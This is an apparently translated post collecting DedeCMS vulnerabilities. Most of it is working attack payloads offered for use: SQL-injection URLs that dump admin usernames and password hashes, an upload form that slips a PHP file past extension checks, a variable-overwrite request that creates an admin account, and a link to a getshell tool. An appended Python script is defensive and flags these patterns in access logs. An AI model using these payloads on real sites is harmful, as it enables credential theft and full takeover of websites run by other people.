Collection of the latest DedeCMS (织梦) vulnerabilities

1. http://www.123.com/plus/feedback.php?aid=11552 (http://www.wooyun.org/bugs/wooyun-2013-017816)
POC:http://www.123.com/plus/feedback.php?validate=ZFCU&action=send&comtype=comments&fid=1&isconfirm=yes&msg=90sec&typeid=0%27%2C%273%27%2C%274%27%2C%275%27%2C%270%27%2C%271351739660%27%2C+%270%27%2C%270%27%2C%270%27%2C%270%27%2C%270%27%2C%27aaaaaa%27%29%2C+%28%2711552%27%2C%272%27%2C@%60%27%60%2C%274%27%2C%275%27%2C%271%27%2C%271351739660%27%2C+%270%27%2C%270%27%2C%270%27%2C%270%27%2C%270%27%2C%28SELECT+concat%28uname%2C0x5f%2Cpwd%2C0x5f%29+FROM+%60%23@__admin%60+limit+3%2C1%29%29%23

 

2. http://www.123.com/plus/search.php?keyword=as (http://www.wooyun.org/bugs/wooyun-2013-017613)
POC:http://www.123.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a

 

3. http://www.123.com/member/ajax_membergroup.php (if the site is vulnerable, the administrator account is disclosed directly)
POC:http://www.123.com/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'`

 

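4. Upload vulnerability script (requires that the site has new-member registration enabled; register and log in, no e-mail verification needed)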

XML/HTML code

    <form action="http://www.123.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">
        file:<input name="uploadfile" type="file" /><br>
        newname:<input name="newname" type="text" value="help.Php"/>
         <button class="button2" type="submit">Submit</button><br><br>
    1. The user must be logged in.<br>
    2. Change the extension of the PHP file to be uploaded to one of "zip|gz|rar|iso|doc|xsl|ppt|wps".<br>
    3. newname is the new file name after upload; the extension uses uppercase letters to bypass the check, e.g. "Php".<br>
    </form>

 

5. /data/mysql_error_trace.inc discloses the admin back end and related information; for details see http://www.wooyun.org/bugs/wooyun-2013-022534

 

6. http://localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

This directly overwrites/adds a back-end login user spider with the password admin; tested successfully on v57 and v57 sp1 (http://zone.wooyun.org/content/4164)

 

7. http://www.123.com/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat(0x3C6162633E,group_concat(0x7C,userid,0x3a,pwd,0x7C),0x3C2F6162633E),5,6,7,8,9%20from%20`%23@__admin`%23%22;

 

8. getshell exp caused by the dedecms variable-overwrite vulnerability (http://zone.wooyun.org/content/4231)

Tool download: http://pan.baidu.com/share/link?shareid=2403045450&uk=587894688
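For reviewing web-server access logs, the request patterns in items 1-7 can be flagged with a short check. This is an added example, not part of the original post or of DedeCMS; the function names, labels and sample request lines are constructed for illustration.

```python
from urllib.parse import urlsplit, parse_qsl, unquote_plus

def decode_codes(pairs, name):
    """Join the decimal values sent as name[] into the string they spell."""
    vals = [v for k, v in pairs if k == name + "[]"]
    return "".join(chr(int(v)) for v in vals
                   if v.isascii() and v.isdigit() and len(v) <= 3)

def inspect(uri):
    """Return the indicators from items 1-7 that appear in one request URI."""
    parts = urlsplit(uri)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    text = unquote_plus(parts.query)
    hits = []
    # Items 1, 2, 3 and 7 all carry the @`'` sequence (item 2 as @`\'`).
    if "@`'`" in text or "@`\\'`" in text:
        hits.append("quote-marker")
    # Items 1, 2, 3 and 7 name the `#@__admin` table in the query string.
    if "#@__admin" in text:
        hits.append("admin-table")
    # Item 7 passes _FILES[...] keys as ordinary query parameters.
    if any(k.startswith("_FILES[") for k, _ in pairs):
        hits.append("files-in-query")
    # Item 4 puts a ../ path into rs[code].
    if any(k.startswith("rs[") and "../" in v for k, v in pairs):
        hits.append("rs-traversal")
    # Item 6 spells strings as character codes in arrs1[] / arrs2[].
    a1, a2 = decode_codes(pairs, "arrs1"), decode_codes(pairs, "arrs2")
    if a1 or a2:
        hits.append("arrs:" + a1 + "|" + a2)
    return hits

# Constructed sample request lines (shortened forms of the patterns above).
SAMPLES = [
    "/plus/list.php?tid=3",
    "/plus/download.php?open=1&"
    + "&".join("arrs1[]=%d" % c for c in b"cfg_dbprefix") + "&arrs2[]=97&arrs2[]=100",
    "/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][tmp_name]=aa\\%27and+char(@`%27`)",
    "/plus/carbuyaction.php?dopost=memclickout&rs[code]=../dialog/select_soft_post",
    "/member/ajax_membergroup.php?action=post&membergroup=@`'`+x+`%23@__admin`",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(inspect(line) or ["clean"], line[:60])
```

Decoding the `arrs1[]`/`arrs2[]` values from a logged item 6 request shows which variable name and value the request tried to set, which helps when checking the admin table for unexpected accounts.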
